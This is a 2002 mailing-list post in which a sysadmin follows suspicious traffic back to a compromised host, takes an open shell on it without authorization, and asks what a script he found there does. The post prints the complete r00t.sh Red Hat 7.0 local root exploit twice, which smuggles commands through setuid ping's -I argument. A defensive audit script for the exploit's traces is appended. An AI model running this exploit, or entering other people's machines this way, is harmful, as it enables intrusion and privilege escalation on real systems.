[lug] script kiddie

jdavis lug at taproot.bz
Sat Nov 30 02:56:34 MST 2002


hello,
  While reviewing last night's Snort logs I noticed a lot of ssl - slapper
like activity from one box to my webserver. The box looked to be
in tyland, so I decided to have a look. An nmap scan of the box in tyland
showed nothing interesting except that port 2000 was open. So I telnetted
to it and got a shell with apache uid. The shell dropped me in / so
I looked in /tmp to see if any slapper files were there... I didn't see
any but there was lots of other stuff.

h-2.05$ ls -la
ls -la
total 7208
drwxr-xr-x   2 apache   apache       4096 Dec  1 19:36  
drwxr-xr-x   3 apache   apache       4096 Nov 23 10:57   
drwxrwxrwt  20 root     root         4096 Dec  1 21:17 .
drwxr-xr-x  22 root     root         4096 Nov 13 08:53 ..
drwxr-xr-x   3 apache   apache       4096 Nov 15 12:18 .. 
drwxr-xr-x   7 apache   apache       4096 Dec  1 19:21 ...
drwxrwxrwt   3 root     root         4096 Nov 29 09:59 .ICE-unix
-rw-------   1 apache   apache       7248 Dec  1 19:41 .bash_history
srw-------   1 root     nobody          0 Jun 27 23:11 .famSDVA9b
srwx------   1 root     nobody          0 Jul  9 09:10 .fam_socket
srw-------   1 root     nobody          0 Jun 26 18:54 .famsJkAwq
drwxrwxrwt   2 xfs      xfs          4096 Nov 13 08:53 .font-unix
drwxr-xr-x   2 apache   apache       4096 Nov 18 20:33 .fontunix
-rw-------   1 apache   apache      12288 Nov 29 22:32 .psybnc.pid.swp
-rw-r--r--   1 apache   apache          0 Nov 23 10:58
982235016-gtkrc-429249277
-rw-r--r--   1 apache   apache      20266 Apr 14  2001 CHANGES
-rw-------   1 apache   apache      17982 Mar 26  2001 COPYING
-rw-r--r--   1 apache   apache       2660 Mar 26  2001 FAQ
-rw-r--r--   1 apache   apache       1347 Apr 15  2001 Makefile
-rw-r--r--   1 apache   apache      36672 Apr 14  2001 README
-rw-r--r--   1 apache   apache         76 Mar 24  2001 TODO
-rw-------   1 apache   apache       4394 Nov 28 16:21 USER1.LOG
-rw-------   1 apache   apache       1275 Nov 28 04:20 USER2.LOG
-rwxr-xr-x   1 apache   apache     620708 Feb 17  2002 bash
-rw-r--r--   1 apache   apache     616831 May 29  2002 bnc.tar.gz
drwxr-xr-x   6 apache   apache       4096 Dec  1 01:00 com
-rw-r--r--   1 apache   apache     958690 Nov 24 22:26 com.tgz
-rw-r--r--   1 apache   apache     958690 Nov 30 20:12 com.tgz.1
-rw-------   1 apache   apache        783 Aug  6  2000 config.h
drwxr-xr-x   2 apache   apache       4096 Mar 23  2001 help
drwxr-xr-x   2 apache   apache       4096 Dec  1 20:53 log
-rw-r--r--   1 apache   apache        717 Feb 17  2002 makefile.out
-rwxr-xr-x   1 apache   apache       6056 Feb 17  2002 makesalt
-rw-r--r--   1 apache   apache      56981 Dec  1 00:43 massopen
-rw-r--r--   1 apache   apache    1937771 Oct 21 00:40 massopen.tgz
-rw-r--r--   1 apache   apache    1937771 Oct 21 00:40 massopen.tgz.1
drwxr-xr-x   3 apache   apache       4096 Jul 31  2000 menuconf
drwxr-xr-x   2 apache   apache       4096 Dec  1 21:28 motd
drwx------   2 root     root         4096 Jul  9 09:13 orbit-root
-rw-------   1 apache   apache       1262 Nov 28 02:55 psybnc.conf
-rw-------   1 apache   apache       1262 Nov 28 02:54 psybnc.conf.old
-rw-------   1 apache   apache          6 Dec  1 20:39 psybnc.pid
-rwxr-xr-x   1 apache   apache        369 Aug  9  2000 psybncchk
-rwxr-xr-x   1 apache   apache       2311 Nov 26 23:10 r00t.sh
drwxr-xr-x   3 apache   apache       4096 Nov 27 00:04 sawfish-root
drwxr-xr-x   3 apache   apache       4096 Jul 31  2000 scripts
-rw-------   1 root     root            0 Nov 13 08:53 session_mm.sem
drwxr-xr-x   2 apache   apache       4096 Feb 17  2002 src
-rw-------   1 apache   apache       3756 Sep 15  2000 targets.mak
drwxr-xr-x   2 apache   apache       4096 Feb 17  2002 tools
drwxr-xr-x   2 apache   apache       4096 Nov 30 23:51 za


so psybnc is an IRC redirector and I know what a salt is but the rest of
what's happening is news to me. Here is the r00t.sh script...

sh-2.05$ cat r0	
cat r00t.sh 
#!/bin/sh

echo
echo "AcEsTa EsTe Un 3xPl0it p3ntRu Red Hat 7.0"
echo "(c) lastDevil lastDevil at millennium.ro "
echo "El A Descoperit Bug-ul =-> Sebastian Krahmer <krahmer at cs.uni-potsdam.de>"
echo
echo "Nu Incercati Sa Rootati RedHat Mai Mici Decat 7.0 Deoarece"
echo "Este Un Bug Gasit De Curand"
echo
echo "Ok. Now Let's Kick Ass:)"
echo  

PING=/bin/ping6
test -u $PING || PING=/bin/ping

if [ ! -u $PING ]; then
  echo "Scuze, nu exista setuid pentru ping"
  exit 0
fi

echo "Faza 1: facem lumea in care se poate scrie a / "

$PING -I ';chmod o+w .' 195.117.3.59 &>/dev/null

sleep 1

echo "Faza 2: compilam aplicatia helperului in /..."

cat >/x.c <<_eof_
main() {
  setuid(0); seteuid(0);
  system("chmod 755 /;rm -f /x; rm -f /x.c");
  execl("/bin/bash","bash","-i",0);
}
_eof_

gcc /x.c -o /x
chmod 755 /x

echo "Faza 3: chown+chmod in aplicatia helperului nostru..."

$PING -I ';chown 0 x' 195.117.3.59 &>/dev/null
sleep 1
$PING -I ';chmod +s x' 195.117.3.59 &>/dev/null
sleep 1

if [ ! -u /x ]; then
  echo "Aparent nu-l pot r00ta :("
  exit 1
fi

echo "Hopa .. uite ca esti r00t :)"

/x

echo "Mersi"
#  Don't flood any more! =-> [www.undernet.org]##!/bin/sh

echo
echo "AcEsTa EsTe Un 3xPl0it p3ntRu Red Hat 7.0"
echo "(c) lastDevil lastDevil at millennium.ro "
echo "El A Descoperit Bug-ul =-> Sebastian Krahmer <krahmer at cs.uni-potsdam.de>"
echo
echo "Nu Incercati Sa Rootati RedHat Mai Mici Decat 7.0 Deoarece"
echo "Este Un Bug Gasit De Curand"
echo
echo "Ok. Now Let's Kick Ass:)"
echo  
echo  

PING=/bin/ping6
test -u $PING || PING=/bin/ping

if [ ! -u $PING ]; then
  echo "Scuze, nu exista setuid pentru ping"
  exit 0
fi

echo "Faza 1: facem lumea in care se poate scrie a / "

$PING -I ';chmod o+w .' 195.117.3.59 &>/dev/null

sleep 1

echo "Faza 2: compilam aplicatia helperului in /..."

cat >/x.c <<_eof_
main() {
  setuid(0); seteuid(0);
  system("chmod 755 /;rm -f /x; rm -f /x.c");
  execl("/bin/bash","bash","-i",0);
}
_eof_

gcc /x.c -o /x
chmod 755 /x

echo "Faza 3: chown+chmod in aplicatia helperului nostru..."

$PING -I ';chown 0 x' 195.117.3.59 &>/dev/null
sleep 1
$PING -I ';chmod +s x' 195.117.3.59 &>/dev/null
sleep 1

if [ ! -u /x ]; then
  echo "Aparent nu-l pot r00ta :("
  exit 1
fi

echo "Hopa .. uite ca esti r00t :)"

/x

echo "Mersi"
#  Don't flood any more! =-> [www.undernet.org]#




i looked at 195.117.3.59 a little and got this result...

sh-2.05$ telnet 195.117.3.59 987
telnet 195.117.3.59 987
Trying 195.117.3.59...
Connected to 195.117.3.59.
Escape character is '^]'.
#KM-v0.1b+

upt: 3303336.38 2861753.33
lav: 1.41 1.33 1.17 2/315 3994
mem:  131047424 128679936  2367488 80031744  1622016 20074496
tim: 14:17:24
dat: 2002-12-01
cpu:  13925461 2968956 27263889 286175333
dsk: 24853630 13005890 1223992 0
pid: 3994
fls: 1200
ino: 3968	3064

sockets: used 281
TCP: inuse 200 highest 473
UDP: inuse 20 highest 48
RAW: inuse 1 highest 3
PAC: inuse 0 highest 1
SYN_COOKIES: count 98 since_last_check 0

Connection closed by foreign host.

can anyone tell me what r00t.sh does? And how would one go about
notifying the owners?

jd
jd at taproot.bz
http://www.taproot.bz
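The r00t.sh above depends on a setuid ping whose -I argument reaches a shell unescaped: it uses that to make / world-writable, compiles a helper at /x, then chowns it to root and sets the setuid bit. The audit below is an added example, not part of jd's post, that checks a filesystem tree for those leftovers plus the psybnc/massopen droppings from the /tmp listing; ROOT and TMPDIR are parameters (assumed layout ROOT/bin/ping and ROOT/bin/ping6) so it can be run against a mounted image or a constructed test tree rather than the live /.

```shell
#!/bin/sh
# Audit a filesystem tree for the traces a r00t.sh-style run leaves behind.
# Added example, not from the post. ROOT/TMPDIR are parameters so the same
# checks work on a mounted disk image or on a throwaway test tree.

# audit_root_tree ROOT TMPDIR  -> one "TAG: path" line per finding
audit_root_tree() {
    root=$1
    tmp=$2

    # Phase 1 of the script: '; chmod o+w .' executed from / via ping -I.
    if [ -d "$root" ] && [ -n "$(find "$root" -maxdepth 0 -perm -002 2>/dev/null)" ]; then
        echo "WORLD-WRITABLE: $root"
    fi

    # Phases 2-3: the compiled helper /x, chowned to root and made setuid.
    find "$root" -maxdepth 1 -type f -perm -4000 2>/dev/null |
        while read -r f; do echo "SETUID-IN-ROOT: $f"; done

    # The primitive the script depends on: a setuid ping or ping6 binary.
    for p in "$root/bin/ping" "$root/bin/ping6"; do
        if [ -u "$p" ]; then echo "SETUID-PING: $p"; fi
    done

    # File names from the /tmp listing in the post (bouncer, scanner, exploit).
    for n in r00t.sh psybnc.conf psybnc.pid psybncchk massopen massopen.tgz bnc.tar.gz com.tgz; do
        if [ -e "$tmp/$n" ]; then echo "DROPPED-FILE: $tmp/$n"; fi
    done
}

# audit_count ROOT TMPDIR  -> number of findings; 0 means nothing matched
audit_count() {
    audit_root_tree "$1" "$2" | wc -l | tr -d ' '
}
```

Run it as `audit_root_tree / /tmp` on a suspect host, or point ROOT at a mount point when working from an image.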
